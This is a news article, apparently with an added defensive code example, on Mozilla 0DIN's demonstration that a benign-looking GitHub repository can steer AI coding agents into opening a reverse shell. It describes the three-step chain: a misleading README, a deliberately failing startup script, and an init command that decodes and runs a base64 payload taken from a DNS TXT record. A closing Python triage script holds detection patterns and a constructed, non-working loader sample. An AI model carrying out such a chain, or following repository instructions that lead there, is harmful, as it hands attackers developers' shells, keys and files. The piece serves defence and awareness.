'Clean' GitHub Repositories Can Deceive Claude Code and AI Agents: Mozilla Warns of Dangers
Mozilla's 0DIN security team has demonstrated that a completely clean GitHub repository, devoid of any malicious code, can still lead an AI coding agent to install a reverse shell on a developer's computer. The primary target of the demonstration is Anthropic's Claude Code, but researchers claim that the same scheme works with Cursor, GitHub Copilot, and Gemini CLI.
What makes the attack unusual is that there is nothing suspicious to detect. The repository contains only a few scaffolding files, none of which would trigger a security check, whether remote, local, or integrated into the agent itself. Its effectiveness comes from combining three steps, each harmless when observed in isolation.
Three Harmless Steps, One Dangerous Result
The first file the AI agent processes is a README that describes how to initialize a Python environment using Axiom, presented as a common monitoring tool. The second element is a fake Axiom startup script, programmed to return an error on first execution. To be helpful and resolve the error, the agent then runs an equally harmless-sounding command, "python3 -m axiom init", exactly as the surrounding context suggests.
This is where the third step, the truly dangerous one, hides. Instead of downloading a file from a URL that a scanner could inspect, the script queries the DNS TXT record of a specific domain. That record contains a base64-encoded string which, once decoded and executed, opens a reverse shell to the attacker. There is no infected file to download and no confirmation prompt to approve: the command looks like a normal initialization operation.
According to the 0DIN researchers, the result is a complete compromise "without exploit code, without alerts, and without any suspicious commands that someone had to approve." Once the shell is obtained, whoever controls the attack inherits the same privileges as the developer: they can read environment variables, steal API keys, access local configuration files, and attempt to establish persistence on the compromised system.
The weakness the attack exploits is therefore not a classical technical vulnerability but the behavior of AI coding agents, which are trained to fix the errors they encounter and to complete the assigned task without pausing to question the source of the instructions they execute. The more eager and proactive an agent is about completing a project's initialization, the more fertile the ground becomes for a scheme of this type.
This discovery comes as the adoption of tools like Claude Code, Cursor, and GitHub Copilot continues to grow among professional and non-professional developers, often with broad permissions on work machines. The authors of the research suggest treating with suspicion any initialization script that asks for additional commands to be run in order to "fix" an error, especially when the package involved is not widely known or verifiable, and limiting as far as possible the privileges with which these agents operate on untrusted repositories.
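One defensive check that follows from the three-link chain described above (DNS TXT lookup, base64 decode, dynamic execution) is a static triage of any "init" script before an agent is allowed to run it. The example below is added here and is not 0DIN's code or part of the demo repository; it flags a script only when all three links co-occur, so ordinary scripts that merely decode base64 or merely spawn a subprocess are not reported. The two sample scripts are constructed for the demonstration, and the suspicious one references undefined names so it is not runnable as written.

```python
"""Static triage of an init script for the DNS-TXT -> base64 -> execute chain.

Added example, not 0DIN's code. Counts how many links of the chain appear in
a script's source and returns a verdict a pre-execution hook could act on.
"""
import re

# One pattern per link of the chain. All three must be present to block.
CHAIN = {
    "dns_txt_lookup": re.compile(
        r"dns\.resolver|resolve\([^)]*['\"]TXT['\"]|\b(dig|nslookup|host)\b[^\n]*\bTXT\b",
        re.I),
    "base64_decode": re.compile(
        r"b64decode\(|base64\s+(-d|--decode)|base64\.decode", re.I),
    "dynamic_exec": re.compile(
        r"\b(exec|eval)\(|subprocess\.(run|Popen|call|check_output)\("
        r"|os\.(system|popen)\(|\|\s*(sh|bash)\b"),
}


def triage(source: str) -> dict:
    """Return which links are present and a verdict: ok, review, or block."""
    hits = {name: bool(rx.search(source)) for name, rx in CHAIN.items()}
    count = sum(hits.values())
    verdict = "block" if count == 3 else "review" if count == 2 else "ok"
    return {"hits": hits, "verdict": verdict}


# Constructed sample: a plain setup script that only installs requirements.
BENIGN = """
import subprocess
subprocess.run(["pip", "install", "-r", "requirements.txt"], check=True)
print("environment ready")
"""

# Constructed sample mirroring the described chain. INIT_DOMAIN and first_txt
# are deliberately undefined placeholders; this fragment is not a working loader.
SUSPICIOUS = """
import base64, dns.resolver
record = dns.resolver.resolve(INIT_DOMAIN, "TXT")
exec(base64.b64decode(first_txt(record)))
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, triage(src))
```

A two-link hit (for example a shell pipeline that decodes base64 straight into `sh`) lands in "review" rather than "block", which is the case a human should look at before the agent proceeds.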